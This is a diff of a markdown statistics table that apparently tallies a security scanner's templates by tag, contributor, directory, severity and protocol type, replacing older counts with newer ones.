-| smtp | 3 | yashgoti | 1 | | | | | | | -| nosqli | 3 | gboddin | 1 | | | | | | | -| search | 3 | _c0wb0y_ | 1 | | | | | | | -| hoteldruid | 3 | wabafet | 1 | | | | | | | -| linkerd | 3 | vzamanillo | 1 | | | | | | | -| sql | 3 | droberson | 1 | | | | | | | -| kafka | 3 | bernardo rodrigues | 1 | | | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | +| cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | | +| | 189 | zzeitlin | 64 | iot | 38 | | | | | +| token-spray | 155 | idealphase | 49 | network | 35 | | | | | +| joomla | 131 | ritikchaddha | 43 | miscellaneous | 23 | | | | | +| config | 126 | gaurang | 42 | cnvd | 23 | | | | | +| cve2018 | 122 | philippedelteil | 36 | dns | 17 | | | | | +| apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | +| cve2019 | 118 | ice3man | 26 | headless | 6 | | | | | +| cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | +| unauth | 111 | c-sh0 | 23 | | | | | | | +| default-login | 111 | ffffffff0x | 22 | | | | | | | +| iot | 104 | akincibor | 20 | | | | | | | +| oast | 97 | for3stco1d | 18 | | | | | | | +| login | 85 | righettod | 18 | | | | | | | +| takeover | 73 | cckuailong | 17 | | | | | | | +| redirect | 73 | pr3r00t | 15 | | | | | | | +| token | 72 | sheikhrishad | 15 | | | | | | | +| cve2022 | 68 | milo2012 | 14 | | | | | | | +| misconfig | 68 | techbrunchfr | 14 | | | | | | | +| cve2017 | 64 | r3dg33k | 14 | | | | | | | +| sqli | 62 | sharath | 13 | | | | | | | +| ssrf | 62 | sullo | 12 | | | | | | | +| file | 60 | suman_kar | 12 | | | | | | | +| wp | 59 | cyllective | 11 | | | | | | | +| router | 58 | melbadry9 | 11 | | | | | | | +| network | 53 | wdahlenb | 11 | | | | | | | +| oracle | 51 | random_robbie | 10 | | | | | | | +| disclosure | 46 | hackergautam | 10 | | | | | | | +| cve2016 | 45 | dogasantos | 10 | | | | | | | +| auth-bypass | 42 | meme-lord | 10 | | | | | | | +| plugin | 40 | nadino | 10 | | | | | | | +| authenticated | 38 | johnk3r | 10 | | | | | | | +| cve2014 | 37 | alph4byt3 | 10 | | | | | | | +| google | 36 | edoardottt | 9 | | | | | | | +| cve2015 | 36 | emadshanab | 9 | | | | | | | +| cisco | 35 | aashiq | 8 | | | | | | | +| injection | 33 | iamthefrogy | 8 | | | | | | | +| logs | 33 | zh | 8 | | | | | | | +| atlassian | 32 | that_juan_ | 8 | | | | | | | +| jira | 30 | forgedhallpass | 7 | | | | | | | +| listing | 30 | dr_set | 7 | | | | | | | +| traversal | 29 | logicalhunter | 7 | | | | | | | +| devops | 29 | 0x240x23elu | 7 | | | | | | | +| generic | 27 | techryptic (@tech) | 7 | | | | | | | +| kubernetes | 26 | randomstr1ng | 7 | | | | | | | +| oss | 25 | kophjager007 | 7 | | | | | | | +| cms | 25 | oppsec | 7 | | | | | | | +| springboot | 24 | harshbothra_ | 7 | | | | | | | +| adobe | 24 | divya_mudgal | 7 | | | | | | | +| cnvd | 23 | random-robbie | 7 | | | | | | | +| proxy | 22 | pathtaga | 6 | | | | | | | +| sap | 22 | pentest_swissky | 6 | | | | | | | +| intrusive | 22 | leovalcante | 6 | | | | | | | +| vmware | 21 | caspergn | 6 | | | | | | | +| debug | 21 | __fazal | 6 | | | | | | | +| misc | 21 | puzzlepeaches | 6 | | | | | | | +| aem | 21 | iamnoooob | 6 | | | | | | | +| microsoft | 21 | evan rubinstein | 6 | | | | | | | +| service | 20 | rootxharsh | 6 | | | | | | | +| fuzz | 20 | tess | 5 | | | | | | | +| wp-theme | 20 | imnightmaree | 5 | | | | | | | +| manageengine | 19 | xelkomy | 5 | | | | | | | +| cve2012 | 19 | _0xf4n9x_ | 5 | | | | | | | +| dns | 19 | podalirius | 5 | | | | | | | +| zoho | 18 | ganofins | 5 | | | | | | | +| deserialization | 18 | veshraj | 5 | | | | | | | +| php | 18 | elsfa7110 | 5 | | | | | | | +| tomcat | 17 | lu4nx | 5 | | | | | | | +| weblogic | 17 | panch0r3d | 5 | | | | | | | +| k8s | 17 | joanbono | 5 | | | | | | | +| aws | 17 | yanyun | 5 | | | | | | | +| ibm | 16 | praetorian-thendrickson | 5 | | | | | | | +| struts | 16 | tanq16 | 4 | | | | | | | +| dlink | 16 | defr0ggy | 4 | | | | | | | +| jenkins | 15 | dadevel | 4 | | | | | | | +| cve2011 | 15 | incogbyte | 4 | | | | | | | +| gitlab | 15 | dolev farhi | 4 | | | | | | | +| fileupload | 15 | nodauf | 4 | | | | | | | +| java | 14 | h1ei1 | 4 | | | | | | | +| cve2009 | 14 | wisnupramoedya | 4 | | | | | | | +| api | 14 | e_schultze_ | 4 | | | | | | | +| hp | 14 | me9187 | 3 | | | | | | | +| xxe | 14 | arcc | 3 | | | | | | | +| android | 14 | _generic_human_ | 3 | | | | | | | +| ruijie | 13 | yash anand @yashanand155 | 3 | | | | | | | +| firewall | 13 | lark-lab | 3 | | | | | | | +| camera | 13 | sushantkamble | 3 | | | | | | | +| netsweeper | 12 | mavericknerd | 3 | | | | | | | +| log4j | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| lfr | 12 | binaryfigments | 3 | | | | | | | +| rails | 12 | shifacyclewala | 3 | | | | | | | +| status | 12 | dudez | 3 | | | | | | | +| printer | 12 | alifathi-h1 | 3 | | | | | | | +| cve2013 | 12 | z3bd | 3 | | | | | | | +| nginx | 12 | supras | 3 | | | | | | | +| netgear | 11 | f1tz | 3 | | | | | | | +| magento | 11 | emenalf | 3 | | | | | | | +| cnvd2021 | 11 | jarijaas | 3 | | | | | | | +| graphql | 11 | skeltavik | 3 | | | | | | | +| fortigate | 10 | johnjhacking | 3 | | | | | | | +| dell | 10 | mr-xn | 3 | | | | | | | +| airflow | 10 | davidmckennirey | 3 | | | | | | | +| jolokia | 10 | 0w4ys | 3 | | | | | | | +| glpi | 10 | r3naissance | 3 | | | | | | | +| grafana | 10 | shine | 3 | | | | | | | +| coldfusion | 10 | thomas_from_offensity | 3 | | | | | | | +| upload | 10 | impramodsargar | 3 | | | | | | | +| spring | 10 | fyoorer | 3 | | | | | | | +| backup | 10 | unstabl3 | 3 | | | | | | | +| auth | 9 | github.com/its0x08 | 3 | | | | | | | +| wso2 | 9 | gitlab red team | 3 | | | | | | | +| woocommerce | 9 | whoever | 3 | | | | | | | +| webserver | 9 | andydoering | 3 | | | | | | | +| iis | 9 | 0xcrypto | 2 | | | | | | | +| ftp | 9 | 0xelkomy | 2 | | | | | | | +| cve2008 | 9 | 0ri2n | 2 | | | | | | | +| mirai | 9 | afaq | 2 | | | | | | | +| jndi | 9 | fabaff | 2 | | | | | | | +| laravel | 9 | r12w4n | 2 | | | | | | | +| windows | 9 | 3th1c_yuk1 | 2 | | | | | | | +| zabbix | 9 | swissky | 2 | | | | | | | +| fastjson | 9 | taielab | 2 | | | | | | | +| github | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 9 | kiblyn11 | 2 | | | | | | | +| fortinet | 9 | vsh00t | 2 | | | | | | | +| citrix | 8 | y4er | 2 | | | | | | | +| confluence | 8 | raesene | 2 | | | | | | | +| solr | 8 | ree4pwn | 2 | | | | | | | +| prometheus | 8 | luci | 2 | | | | | | | +| django | 8 | joeldeleep | 2 | | | | | | | +| zyxel | 8 | pxmme1337 | 2 | | | | | | | +| audit | 8 | amsda | 2 | | | | | | | +| azure | 8 | thardt-praetorian | 2 | | | | | | | +| scada | 8 | danielmofer | 2 | | | | | | | +| blind | 8 | 0xsmiley | 2 | | | | | | | +| kube | 8 | ehsahil | 2 | | | | | | | +| vcenter | 8 | sbani | 2 | | | | | | | +| phpmyadmin | 8 | lotusdll | 2 | | | | | | | +| amazon | 8 | moritz nentwig | 2 | | | | | | | +| metadata | 8 | bsysop | 2 | | | | | | | +| ssti | 7 | g4l1t0 | 2 | | | | | | | +| python | 7 | z0ne | 2 | | | | | | | +| vpn | 7 | smaranchand | 2 | | | | | | | +| kafka | 7 | zomsop82 | 2 | | | | | | | +| rconfig | 7 | nkxxkn | 2 | | | | | | | +| firebase | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| files | 7 | 0xrudra | 2 | | | | | | | +| mail | 7 | mohammedsaneem | 2 | | | | | | | +| bucket | 7 | paperpen | 2 | | | | | | | +| maps | 7 | geekby | 2 | | | | | | | +| squirrelmail | 7 | redteambrasil | 2 | | | | | | | +| elasticsearch | 7 | hackerarpan | 2 | | | | | | | +| exchange | 7 | joshlarsen | 2 | | | | | | | +| cnvd2020 | 7 | vavkamil | 2 | | | | | | | +| sonicwall | 7 | hetroublemakr | 2 | | | | | | | +| backdoor | 6 | nuk3s3c | 2 | | | | | | | +| go | 6 | sy3omda | 2 | | | | | | | +| jetty | 6 | bp0lr | 2 | | | | | | | +| magmi | 6 | hahwul | 2 | | | | | | | +| nodejs | 6 | socketz | 2 | | | | | | | +| cicd | 6 | 0xprial | 2 | | | | | | | +| jboss | 6 | x1m_martijn | 2 | | | | | | | +| huawei | 6 | its0x08 | 2 | | | | | | | +| ofbiz | 6 | bing0o | 2 | | | | | | | +| docker | 6 | badboycxcc | 2 | | | | | | | +| druid | 6 | bananabr | 2 | | | | | | | +| firmware | 6 | k11h-de | 2 | | | | | | | +| dedecms | 6 | udit_thakkur | 2 | | | | | | | +| crlf | 6 | convisoappsec | 2 | | | | | | | +| zimbra | 6 | gal nagli | 2 | | | | | | | +| fpd | 6 | kre80r | 2 | | | | | | | +| bigip | 6 | splint3r7 | 2 | | | | | | | +| cobbler | 6 | paradessia | 2 | | | | | | | +| ecology | 6 | nvn1729 | 2 | | | | | | | +| bypass | 6 | ambassify | 2 | | | | | | | +| sitecore | 6 | manas_harsh | 2 | | | | | | | +| lucee | 6 | parth | 2 | | | | | | | +| headless | 6 | martincodes-de | 2 | | | | | | | +| enum | 6 | randomrobbie | 2 | | | | | | | +| slack | 6 | rafaelwdornelas | 2 | | | | | | | +| kubelet | 5 | hassan khan yusufzai - | 2 | | | | | | | +| | | splint3r7 | | | | | | | | +| rfi | 5 | dahse89 | 2 | | | | | | | +| solarwinds | 5 | w4cky_ | 2 | | | | | | | +| icewarp | 5 | cckuakilong | 2 | | | | | | | +| symfony | 5 | huowuzhao | 2 | | | | | | | +| artica | 5 | 0xsapra | 2 | | | | | | | +| microweber | 5 | koti2 | 2 | | | | | | | +| apisix | 5 | dheerajmadhukar | 2 | | | | | | | +| circarlife | 5 | bernardofsr | 2 | | | | | | | +| setup | 5 | ajaysenr | 2 | | | | | | | +| strapi | 5 | foulenzer | 2 | | | | | | | +| rseenet | 5 | cocxanh | 2 | | | | | | | +| cache | 5 | gevakun | 2 | | | | | | | +| ruby | 5 | v0idc0de | 1 | | | | | | | +| git | 5 | mass0ma | 1 | | | | | | | +| moodle | 5 | manuelbua | 1 | | | | | | | +| metinfo | 5 | bartu utku sarp | 1 | | | | | | | +| opensis | 5 | amnotacat | 1 | | | | | | | +| zhiyuan | 5 | j33n1k4 | 1 | | | | | | | +| keycloak | 5 | gboddin | 1 | | | | | | | +| fatpipe | 5 | cookiehanhoan | 1 | | | | | | | +| storage | 5 | luskabol | 1 | | | | | | | +| leak | 5 | intx0x80 | 1 | | | | | | | +| thinkphp | 5 | 0xd0ff9 | 1 | | | | | | | +| symantec | 5 | duty_1g | 1 | | | | | | | +| error | 5 | kareemse1im | 1 | | | | | | | +| samsung | 5 | fopina | 1 | | | | | | | +| minio | 5 | sherlocksecurity | 1 | | | | | | | +| gocd | 5 | arm!tage | 1 | | | | | | | +| node | 5 | c3l3si4n | 1 | | | | | | | +| alibaba | 5 | mesaglio | 1 | | | | | | | +| ssl | 5 | kiks7 | 1 | | | | | | | +| voip | 4 | pdp | 1 | | | | | | | +| panos | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| puppet | 4 | adrianmf | 1 | | | | | | | +| ssh | 4 | udyz | 1 | | | | | | | +| couchdb | 4 | hanlaomo | 1 | | | | | | | +| hoteldruid | 4 | xshuden | 1 | | | | | | | +| resin | 4 | omarkurt | 1 | | | | | | | +| beyondtrust | 4 | aresx | 1 | | | | | | | +| websphere | 4 | yashgoti | 1 | | | | | | | +| oa | 4 | 0xceba | 1 | | | | | | | +| hongdian | 4 | rubina119 | 1 | | | | | | | +| sophos | 4 | thesubtlety | 1 | | | | | | | +| sonarqube | 4 | _darrenmartyn | 1 | | | | | | | +| plesk | 4 | geraldino2 | 1 | | | | | | | +| buffalo | 4 | jeya.seelan | 1 | | | | | | | +| microstrategy | 4 | andysvints | 1 | | | | | | | +| gogs | 4 | mhdsamx | 1 | | | | | | | +| hpe | 4 | prajiteshsingh | 1 | | | | | | | +| thinkcmf | 4 | kabirsuda | 1 | | | | | | | +| smtp | 4 | 0xrod | 1 | | | | | | | +| prestashop | 4 | ratnadip gajbhiye | 1 | | | | | | | +| search | 4 | s1r1u5_ | 1 | | | | | | | +| jetbrains | 4 | qlkwej | 1 | | | | | | | +| flink | 4 | sec_hawk | 1 | | | | | | | +| activemq | 4 | regala_ | 1 | | | | | | | +| elastic | 4 | affix | 1 | | | | | | | +| cacti | 4 | akash.c | 1 | | | | | | | +| springcloud | 4 | oscarintherocks | 1 | | | | | | | +| jellyfin | 4 | luqmaan hadia | 1 | | | | | | | +| xmlrpc | 4 | willd96 | 1 | | | | | | | +| caucho | 4 | mrcl0wnlab | 1 | | | | | | | +| artifactory | 4 | schniggie | 1 | | | | | | | +| stripe | 4 | streetofhackerr007 | 1 | | | | | | | +| hikvision | 4 | ohlinge | 1 | | | | | | | +| cnvd2019 | 4 | infosecsanyam | 1 | | | | | | | +| db | 4 | zhenwarx | 1 | | | | | | | +| wcs | 4 | wabafet | 1 | | | | | | | +| cockpit | 4 | th3.d1p4k | 1 | | | | | | | +| paypal | 4 | pudsec | 1 | | | | | | | +| terramaster | 4 | compr00t | 1 | | | | | | | +| cve2007 | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| awstats | 4 | osamahamad | 1 | | | | | | | +| ognl | 4 | ldionmarcil | 1 | | | | | | | +| tikiwiki | 4 | ok_bye_now | 1 | | | | | | | +| kevinlab | 4 | d4vy | 1 | | | | | | | +| kibana | 4 | iampritam | 1 | | | | | | | +| mongodb | 4 | momen eldawakhly | 1 | | | | | | | +| aspose | 4 | knassar702 | 1 | | | | | | | +| asp | 4 | wlayzz | 1 | | | | | | | +| cloud | 4 | anon-artist | 1 | | | | | | | +| mailchimp | 4 | ooooooo_q | 1 | | | | | | | +| adminer | 4 | sicksec | 1 | | | | | | | +| npm | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| nexus | 4 | tea | 1 | | | | | | | +| photo | 4 | xstp | 1 | | | | | | | +| exposures | 3 | juicypotato1 | 1 | | | | | | | +| wavlink | 3 | 0ut0fb4nd | 1 | | | | | | | +| elfinder | 3 | alexrydzak | 1 | | | | | | | +| dos | 3 | retr02332 | 1 | | | | | | | +| axigen | 3 | ggranjus | 1 | | | | | | | +| jamf | 3 | arall | 1 | | | | | | | +| geowebserver | 3 | nielsing | 1 | | | | | | | +| httpd | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| redis | 3 | thezakman | 1 | | | | | | | +| sangfor | 3 | petruknisme | 1 | | | | | | | +| ampps | 3 | alevsk | 1 | | | | | | | +| linksys | 3 | 0h1in9e | 1 | | | | | | | +| sql | 3 | thebinitghimire | 1 | | | | | | | +| zeroshell | 3 | majidmc2 | 1 | | | | | | | +| hashicorp | 3 | elouhi | 1 | | | | | | | +| 3cx | 3 | ph33r | 1 | | | | | | | +| samba | 3 | jeya seelan | 1 | | | | | | | +| telerik | 3 | bad5ect0r | 1 | | | | | | | +| axis | 3 | ahmed sherif | 1 | | | | | | | +| modem | 3 | alex | 1 | | | | | | | +| epson | 3 | justmumu | 1 | | | | | | | +| aptus | 3 | _harleo | 1 | | | | | | | +| subrion | 3 | higor melgaço (eremit4) | 1 | | | | | | | +| database | 3 | ola456 | 1 | | | | | | | +| thinfinity | 3 | 0xceeb | 1 | | | | | | | +| heroku | 3 | nerrorsec | 1 | | | | | | | +| dotcms | 3 | daffianfo | 1 | | | | | | | +| movable | 3 | brenocss | 1 | | | | | | | +| kingsoft | 3 | nytr0gen | 1 | | | | | | | +| netlify | 3 | miroslavsotak | 1 | | | | | | | +| phppgadmin | 3 | b0yd | 1 | | | | | | | +| messaging | 3 | jbaines-r7 | 1 | | | | | | | +| lansweeper | 3 | izn0u | 1 | | | | | | | +| square | 3 | d0rkerdevil | 1 | | | | | | | +| javascript | 3 | hexcat | 1 | | | | | | | +| dreambox | 3 | sickwell | 1 | | | | | | | +| nacos | 3 | clarkvoss | 1 | | | | | | | +| axis2 | 3 | borna nematzadeh | 1 | | | | | | | +| circleci | 3 | b0rn2r00t | 1 | | | | | | | +| seeyon | 3 | yavolo | 1 | | | | | | | +| synology | 3 | yashanand155 | 1 | | | | | | | +| pentaho | 3 | rotemreiss | 1 | | | | | | | +| empirecms | 3 | skylark-lab | 1 | | | | | | | +| concrete | 3 | flag007 | 1 | | | | | | | +| ebs | 3 | bjhulst | 1 | | | | | | | +| splunk | 3 | jas37 | 1 | | | | | | | +| octobercms | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| exposures | 3 | remonsec | 1 | | | | | | | -| r-seenet | 3 | un-fmunozs | 1 | | | | | | | -| ampps | 3 | patralos | 1 | | | | | | | -| hashicorp | 3 | jrolf | 1 | | | | | | | -| log | 3 | _darrenmartyn | 1 | | | | | | | -| openam | 3 | kareemse1im | 1 | | | | | | | -| terramaster | 3 | nerrorsec | 1 | | | | | | | -| springcloud | 3 | b4uh0lz | 1 | | | | | | | -| sonicwall | 3 | b0yd | 1 | | | | | | | -| lfr | 3 | j33n1k4 | 1 | | | | | | | -| github | 3 | alex | 1 | | | | | | | -| druid | 3 | 2rs3c | 1 | | | | | | | -| injection | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| cacti | 3 | petruknisme | 1 | | | | | | | -| httpd | 3 | hakluke | 1 | | | | | | | -| zhiyuan | 3 | redteambrasil | 1 | | | | | | | -| nacos | 3 | kurohost | 1 | | | | | | | -| rackstation | 2 | aresx | 1 | | | | | | | -| hjtcloud | 2 | becivells | 1 | | | | | | | -| frontpage | 2 | thebinitghimire | 1 | | | | | | | -| plesk | 2 | fq_hsu | 1 | | | | | | | -| centos | 2 | blckraven | 1 | | | | | | | -| ecology | 2 | izn0u | 1 | | | | | | | -| huawei | 2 | orpheus | 1 | | | | | | | -| wuzhicms | 2 | ofjaaah | 1 | | | | | | | -| phpcollab | 2 | charanrayudu | 1 | | | | | | | -| python | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| pega | 2 | manuelbua | 1 | | | | | | | -| wordfence | 2 | yuansec | 1 | | | | | | | -| aviatrix | 2 | iampritam | 1 | | | | | | | -| ems | 2 | cookiehanhoan | 1 | | | | | | | -| jboss | 2 | sbani | 1 | | | | | | | -| rstudio | 2 | thevillagehacker | 1 | | | | | | | -| justwriting | 2 | retr02332 | 1 | | | | | | | -| backups | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| hostheader-injection | 2 | alperenkesk | 1 | | | | | | | -| gitlist | 2 | rodnt | 1 | | | | | | | -| neos | 2 | thezakman | 1 | | | | | | | -| lotus | 2 | kba@sogeti_esec | 1 | | | | | | | -| adminer | 2 | tirtha_mandal | 1 | | | | | | | -| kong | 2 | c3l3si4n | 1 | | | | | | | -| kentico | 2 | evan rubinstein | 1 | | | | | | | -| jsf | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| qcubed | 2 | flag007 | 1 | | | | | | | -| middleware | 2 | 0xtavian | 1 | | | | | | | -| commax | 2 | mhdsamx | 1 | | | | | | | -| trixbox | 2 | toufik airane | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| voipmonitor | 3 | evan rubinstien | 1 | | | | | | | +| dolibarr | 3 | 0xh7ml | 1 | | | | | | | +| cloudflare | 3 | igibanez | 1 | | | | | | | +| bruteforce | 3 | daviey | 1 | | | | | | | +| sendgrid | 3 | act1on3 | 1 | | | | | | | +| glassfish | 3 | deena | 1 | | | | | | | +| prtg | 3 | ilovebinbash | 1 | | | | | | | +| odoo | 3 | 0xtavian | 1 | | | | | | | +| trixbox | 3 | myztique | 1 | | | | | | | +| openemr | 3 | retr0 | 1 | | | | | | | +| horizon | 3 | orpheus | 1 | | | | | | | +| oauth | 3 | berkdusunur | 1 | | | | | | | +| vrealize | 3 | f1she3 | 1 | | | | | | | +| workspaceone | 3 | apt-mirror | 1 | | | | | | | +| sharepoint | 3 | becivells | 1 | | | | | | | +| sugarcrm | 3 | lethargynavigator | 1 | | | | | | | +| phpinfo | 3 | exceed | 1 | | | | | | | +| seagate | 3 | ofjaaah | 1 | | | | | | | +| vbulletin | 3 | toufik-airane | 1 | | | | | | | +| actuator | 3 | breno_css | 1 | | | | | | | +| targa | 3 | rodnt | 1 | | | | | | | +| wordfence | 3 | zandros0 | 1 | | | | | | | +| log | 3 | rschio | 1 | | | | | | | +| jfrog | 3 | narluin | 1 | | | | | | | +| facebook | 3 | notnotnotveg | 1 | | | | | | | +| mcafee | 3 | dhiyaneshdki | 1 | | | | | | | +| panabit | 3 | p-l- | 1 | | | | | | | +| globalprotect | 3 | tim_koopmans | 1 | | | | | | | +| openssh | 3 | fmunozs | 1 | | | | | | | +| kentico | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| natshell | 2 | 0h1in9e | 1 | | | | | | | -| spark | 2 | kre80r | 1 | | | | | | | -| status | 2 | exploitation | 1 | | | | | | | -| phpstorm | 2 | intx0x80 | 1 | | | | | | | -| nagios | 2 | sicksec | 1 | | | | | | | -| ecoa | 2 | co0nan | 1 | | | | | | | -| igs | 2 | brabbit10 | 1 | | | | | | | -| rosariosis | 2 | florianmaak | 1 | | | | | | | -| pgadmin | 2 | notsoevilweasel | 1 | | | | | | | -| ec2 | 2 | tim_koopmans | 1 | | | | | | | -| jetbrains | 2 | shelld3v | 1 | | | | | | | -| idea | 2 | pdp | 1 | | | | | | | -| horde | 2 | affix | 1 | | | | | | | -| leak | 2 | raesene | 1 | | | | | | | -| liferay | 2 | retr0 | 1 | | | | | | | -| service | 2 | xstp | 1 | | | | | | | -| vcenter | 2 | sickwell | 1 | | | | | | | -| mcafee | 2 | qlkwej | 1 | | | | | | | -| jeedom | 2 | shifacyclewla | 1 | | | | | | | -| zeroshell | 2 | berkdusunur | 1 | | | | | | | -| frp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| bitly | 2 | notnotnotveg | 1 | | | | | | | -| rancher | 2 | willd96 | 1 | | | | | | | -| ruby | 2 | alevsk | 1 | | | | | | | -| splunk | 2 | ilovebinbash | 1 | | | | | | | -| prestashop | 2 | zandros0 | 1 | | | | | | | -| text | 2 | rojanrijal | 1 | | | | | | | -| chamilo | 2 | sec_hawk | 1 | | | | | | | -| dolibarr | 2 | harshinsecurity | 1 | | | | | | | -| aspose | 2 | furkansayim | 1 | | | | | | | -| chyrp | 2 | akshansh | 1 | | | | | | | -| forcepoint | 2 | majidmc2 | 1 | | | | | | | -| qihang | 2 | borna nematzadeh | 1 | | | | | | | -| ucmdb | 2 | makyotox | 1 | | | | | | | -| totemomail | 2 | juicypotato1 | 1 | | | | | | | -| idrac | 2 | lethargynavigator | 1 | | | | | | | -| places | 2 | infosecsanyam | 1 | | | | | | | -| chiyu | 2 | lark lab | 1 | | | | | | | -| ad | 2 | soyelmago | 1 | | | | | | | -| aruba | 2 | furkansenan | 1 | | | | | | | -| synology | 2 | nvn1729 | 1 | | | | | | | -| getsimple | 2 | taielab | 1 | | | | | | | -| maian | 2 | rotemreiss | 1 | | | | | | | -| rockmongo | 2 | andirrahmani1 | 1 | | | | | | | -| fortinet | 2 | oscarintherocks | 1 | | | | | | | -| akamai | 2 | knassar702 | 1 | | | | | | | -| netis | 2 | ahmed sherif | 1 | | | | | | | -| openvpn | 2 | 0xh7ml | 1 | | | | | | | -| webcam | 2 | absshax | 1 | | | | | | | -| myfactory | 2 | kabirsuda | 1 | | | | | | | -| guacamole | 2 | shreyapohekar | 1 | | | | | | | -| yii | 2 | push4d | 1 | | | | | | | -| bypass | 2 | 0xrod | 1 | | | | | | | -| gitea | 2 | yavolo | 1 | | | | | | | -| voipmonitor | 2 | luskabol | 1 | | | | | | | -| embed | 2 | dawid-czarnecki | 1 | | | | | | | -| linux | 2 | mass0ma | 1 | | | | | | | -| upload | 2 | b0rn2r00t | 1 | | | | | | | -| axis | 2 | bjhulst | 1 | | | | | | | -| openfire | 2 | 0xteles | 1 | | | | | | | -| showdoc | 2 | pratik khalane | 1 | | | | | | | -| cache | 2 | streetofhackerr007 | 1 | | | | | | | -| nextjs | 2 | igibanez | 1 | | | | | | | -| linksys | 2 | regala_ | 1 | | | | | | | -| axis2 | 2 | elder tao | 1 | | | | | | | -| shellshock | 2 | x6263 | 1 | | | | | | | -| waf | 2 | ringo | 1 | | | | | | | -| dos | 2 | husain | 1 | | | | | | | -| xxljob | 2 | jteles | 1 | | | | | | | -| avantfax | 2 | luqman | 1 | | | | | | | -| prtg | 2 | elouhi | 1 | | | | | | | -| openemr | 2 | yashanand155 | 1 | | | | | | | -| influxdb | 2 | 0ut0fb4nd | 1 | | | | | | | -| yapi | 2 | aceseven (digisec360) | 1 | | | | | | | -| rocketchat | 2 | akash.c | 1 | | | | | | | -| hpe | 2 | zhenwarx | 1 | | | | | | | -| bucket | 2 | evolutionsec | 1 | | | | | | | -| tidb | 2 | mah3sec_ | 1 | | | | | | | -| metabase | 2 | luci | 1 | | | | | | | -| graphql | 2 | noamrathaus | 1 | | | | | | | -| akkadian | 2 | jiheon-dev | 1 | | | | | | | -| linkedin | 2 | | | | | | | | | -| sharepoint | 2 | | | | | | | | | -| seeyon | 2 | | | | | | | | | -| odoo | 2 | | | | | | | | | -| harbor | 2 | | | | | | | | | -| glassfish | 2 | | | | | | | | | -| oauth | 2 | | | | | | | | | -| mailchimp | 2 | | | | | | | | | -| favicon | 2 | | | | | | | | | -| heroku | 2 | | | | | | | | | -| sonarqube | 2 | | | | | | | | | -| couchdb | 2 | | | | | | | | | -| electron | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| resourcespace | 2 | | | | | | | | | -| geowebserver | 2 | | | | | | | | | -| hasura | 2 | | | | | | | | | -| saltstack | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | -| s3 | 2 | | | | | | | | | -| payara | 2 | | | | | | | | | -| emerge | 2 | | | | | | | | | -| ilo | 2 | | | | | | | | | -| redis | 2 | | | | | | | | | -| vrealize | 2 | | | | | | | | | -| mida | 2 | | | | | | | | | -| nextcloud | 2 | | | | | | | | | -| flir | 2 | | | | | | | | | -| hikvision | 2 | | | | | | | | | -| grav | 2 | | | | | | | | | +| consul | 3 | kailashbohara | 1 | | | | | | | +| trendnet | 3 | francescocarlucci | 1 | | | | | | | +| nuuo | 3 | exploitation | 1 | | | | | | | +| cisa | 3 | 0xteles | 1 | | | | | | | +| fanruan | 3 | zsusac | 1 | | | | | | | +| smb | 3 | sshell | 1 | | | | | | | +| postmessage | 3 | prettyboyaaditya | 1 | | | | | | | +| rlm | 3 | remi gascou (podalirius) | 1 | | | | | | | +| lotus | 3 | husain | 1 | | | | | | | +| linkerd | 3 | noamrathaus | 1 | | | | | | | +| jeesns | 3 | rojanrijal | 1 | | | | | | | +| openbmcs | 3 | shifacyclewla | 1 | | | | | | | +| mongo | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| centos | 3 | alperenkesk | 1 | | | | | | | +| graph | 3 | clment cruchet | 1 | | | | | | | +| umbraco | 3 | hakluke | 1 | | | | | | | +| selea | 3 | blckraven | 1 | | | | | | | +| bitrix | 3 | andirrahmani1 | 1 | | | | | | | +| grav | 3 | ringo | 1 | | | | | | | +| ems | 3 | revblock | 1 | | | | | | | +| httpbin | 3 | makyotox | 1 | | | | | | | +| openam | 3 | iphantasmic | 1 | | | | | | | +| webadmin | 3 | manasmbellani | 1 | | | | | | | +| fuelcms | 3 | arr0way | 1 | | | | | | | +| fortios | 3 | soyelmago | 1 | | | | | | | +| nosqli | 3 | bughuntersurya | 1 | | | | | | | +| servicenow | 2 | absshax | 1 | | | | | | | +| syslog | 2 | notsoevilweasel | 1 | | | | | | | +| listserv | 2 | ahmed abou-ela | 1 | | | | | | | +| pam | 2 | elmahdi | 1 | | | | | | | +| neos | 2 | tirtha_mandal | 1 | | | | | | | +| javamelody | 2 | vzamanillo | 1 | | | | | | | +| chyrp | 2 | remonsec | 1 | | | | | | | +| jsf | 2 | kba@sogeti_esec | 1 | | | | | | | +| orchid | 2 | phyr3wall | 1 | | | | | | | +| getsimple | 2 | 2rs3c | 1 | | | 